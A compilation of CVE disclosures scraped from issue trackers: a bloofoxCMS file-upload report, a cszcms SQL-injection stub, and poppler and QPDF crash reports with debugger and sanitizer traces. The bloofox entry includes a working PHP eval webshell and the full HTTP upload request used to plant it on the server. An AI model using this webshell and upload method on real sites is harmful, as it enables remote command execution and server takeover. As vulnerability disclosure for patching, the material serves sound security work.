File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

CVE-2020-36082: An arbitrary file upload vulnerability was found · Issue #7 · alexlang24/bloofoxCMS

SQL Injection vulnerability in cskaza cszcms version 1.2.9, allows attackers to gain sensitive information via pm_sendmail parameter in csz_model.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-36136: Bug Report: SQL injection vulnerability · Issue #26 · cskaza/cszcms

An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.

      299      } else {
        300          (*outputFunc)(outputStream, "256 array\n", 10);
        301          (*outputFunc)(outputStream, "0 1 255 {1 index exch /.notdef put} for\n", 40);
        302          enc = newEncoding ? newEncoding : (const char **)encoding;
        303          for (i = 0; i < 256; ++i) {
     →  304              if (enc[i]) { // enc == 0
        305                  buf = GooString::format("dup {0:d} /{1:s} put\n", i, enc[i]);
        306                  (*outputFunc)(outputStream, buf->c_str(), buf->getLength());
        307                  delete buf;
        308              }
        309          }
    

enc == 0 in line 304.

       0x7c6e5d <FoFiType1C::convertToType1(char+0> shr    rax, 0x3
         0x7c6e61 <FoFiType1C::convertToType1(char+0> cmp    BYTE PTR [rax+0x7fff8000], 0x0
         0x7c6e68 <FoFiType1C::convertToType1(char+0> jne    0x7c9bfe <FoFiType1C::convertToType1(char const*,  char const**,  bool,  void (*)(void*,  char const*,  int),  void*)+17710>
     →   0x7c6e6e <FoFiType1C::convertToType1(char+0> mov    rdx, QWORD PTR [r15]
         0x7c6e71 <FoFiType1C::convertToType1(char+0> test   rdx, rdx
         0x7c6e74 <FoFiType1C::convertToType1(char+0> je     0x7c6df8 <FoFiType1C::convertToType1(char const*,  char const**,  bool,  void (*)(void*,  char const*,  int),  void*)+5928>
         0x7c6e76 <FoFiType1C::convertToType1(char+0> mov    rax, QWORD PTR [rip+0x926943]        # 0x10ed7c0 <__afl_area_ptr>
         0x7c6e7d <FoFiType1C::convertToType1(char+0> add    BYTE PTR [rax+0x4f23], 0x1
         0x7c6e84 <FoFiType1C::convertToType1(char+0> mov    DWORD PTR fs:[r13+0x0], 0x245f
    
    
    gef➤  print $r15
    $7 = 0x0

    [#0] 0x7c6e6e → FoFiType1C::convertToType1(this=<optimized out>, psName=0x603000019360 "ERGTBC+#3ceoSansIntel", newEncoding=<optimized out>, ascii=<optimized out>, outputFunc=<optimized out>, outputStream=<optimized out>)
    [#1] 0x6346ca → PSOutputDev::setupEmbeddedType1CFont(this=0x619000000f80, font=<optimized out>, id=<optimized out>, psName=<optimized out>)
    [#2] 0x629553 → PSOutputDev::setupFont(this=0x619000000f80, font=<optimized out>, parentResDict=<optimized out>)
    [#3] 0x62630c → PSOutputDev::setupFonts(this=<optimized out>, resDict=0x6070000020f0)
    [#4] 0x622f01 → PSOutputDev::setupResources(this=0x619000000f80, resDict=0x6070000020f0)
    [#5] 0x61da18 → PSOutputDev::writeDocSetup(this=0x619000000f80, catalog=<optimized out>, pageList=<optimized out>, duplexA=<optimized out>)
    [#6] 0x6195db → PSOutputDev::postInit(this=0x619000000f80)
    [#7] 0x6406e9 → PSOutputDev::checkPageSlice(this=<optimized out>, page=<optimized out>, rotateA=<optimized out>, useMediaBox=<optimized out>, crop=0x1, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>)
    [#8] 0xa31aad → Page::displaySlice(this=<optimized out>, out=0x619000000f80, hDPI=<optimized out>, vDPI=<optimized out>, rotate=<optimized out>, useMediaBox=<optimized out>, crop=<optimized out>, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>, copyXRef=<optimized out>)
    [#9] 0xa31944 → Page::display(this=0x61a0000006a0, out=0x14, hDPI=1.5817496953307363e-153, vDPI=9.041152192150418e+271, rotate=0x0, useMediaBox=0x0, crop=0x0, printing=<optimized out>, abortCheckCbk=0x0, abortCheckCbkData=0x0, annotDisplayDecideCbk=0x0, annotDisplayDecideCbkData=0x0, copyXRef=<optimized out>)

CVE-2020-36024: NULL-Pointer Deference in `FoFiType1C::convertToType1` (#1016) · Issues · poppler / poppler · GitLab

An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.

    ==107470==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc5f160fd8 (pc 0x0000004ded5c bp 0x7ffc5f161850 sp 0x7ffc5f160fe0 T0)
        #0 0x4ded5b in __asan_memcpy (/src/poppler_test/build/utils/pdftops+0x4ded5b)
        #1 0x817158 in FoFiType1C::getOp(int, bool, bool*) /src/poppler_test/fofi/FoFiType1C.cc:2620:21
        #2 0x8077bd in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc:1141:15
        #3 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #4 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #5 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #6 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #7 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #8 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #9 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #10 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #11 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #12 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #13 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #14 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #15 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #16 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #17 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #18 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #19 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #20 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #21 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #22 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #23 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #24 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #25 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #26 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #27 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #28 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #29 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #30 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #31 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #32 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #33 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #34 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #35 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #36 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #37 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #38 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #39 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #40 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #41 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #42 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
    ...
    ...

This cause segmentation fault without ASAN.

CVE-2020-36023: Stack-Overflow in `FoFiType1C::cvtGlyph` results in Segmentation Fault (#1013) · Issues · poppler / poppler · GitLab

An issue was discovered in QPDF version 10.0.4, allows remote attackers to execute arbitrary code via crafted .pdf file to Pl_ASCII85Decoder::write parameter in libqpdf.

*   version: 10.0.4
*   commit: 78b9d6b
*   How to reproduce: qpdf\_afl\_fuzzer ./poc

The log from ASAN:

    ==28751==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000076c5 at pc 0x0000008799bc bp 0x7fffffff6a30 sp 0x7fffffff6a28
    WRITE of size 1 at 0x6070000076c5 thread T0
        #0 0x8799bb in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32
        #1 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16
        #2 0x877c75 in Pl_AES_PDF::finish() /src/qpdf/libqpdf/Pl_AES_PDF.cc
        #3 0x5996ab in QPDF::pipeStreamData(PointerHolder<QPDF::EncryptionParameters>, PointerHolder<InputSource>, QPDF&, int, int, long long, unsigned long, QPDFObjectHandle, bool, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2899:23
        #4 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12
        #5 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19
        #6 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8
        #7 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51
        #8 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24
        #9 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2
        #10 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2
        #11 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2
        #12 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12
        #13 0x51cb03 in FuzzHelper::testWrite() /src/qpdf_afl_fuzzer.cc:92:5
        #14 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5
        #15 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210
        #16 0x5221b7 in main /src/qpdf_afl_fuzzer.cc:228:7
        #17 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #18 0x41eb89 in _start (/src/qpdf_afl_fuzzer+0x41eb89)
    
    0x6070000076c5 is located 21 bytes inside of 78-byte region [0x6070000076b0,0x6070000076fe)
    freed by thread T0 here:
        #0 0x517d68 in operator delete(void*) (/src/qpdf_afl_fuzzer+0x517d68)
        #1 0x7ffff7af21a9 in std::runtime_error::~runtime_error() (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xa81a9)
        #2 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12
        #3 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19
        #4 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8
        #5 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51
        #6 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24
        #7 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2
        #8 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2
        #9 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2
        #10 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12
        #11 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5
        #12 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210
        #13 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    
    previously allocated by thread T0 here:
        #0 0x516ff0 in operator new(unsigned long) (/src/qpdf_afl_fuzzer+0x516ff0)
        #1 0x7ffff7b1dc28 in std::string::_Rep::_S_create(unsigned long, unsigned long, std::allocator<char> const&) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd3c28)
        #2 0x883ce8 in Pl_Flate::handleData(unsigned char*, unsigned long, int) /src/qpdf/libqpdf/Pl_Flate.cc:197:12
        #3 0x8833d5 in Pl_Flate::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_Flate.cc:92:9
        #4 0x87a0a7 in Pl_ASCII85Decoder::flush() /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:122:16
        #5 0x87997b in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:88:4
        #6 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32 in Pl_ASCII85Decoder::write(unsigned char*, unsigned long)
    Shadow bytes around the buggy address:
      0x0c0e7fff8e80: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x0c0e7fff8e90: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fd fd
      0x0c0e7fff8ea0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8eb0: fd fd fd fd fd fd fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff8ec0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x0c0e7fff8ed0: 00 fa fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd
      0x0c0e7fff8ee0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
      0x0c0e7fff8ef0: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
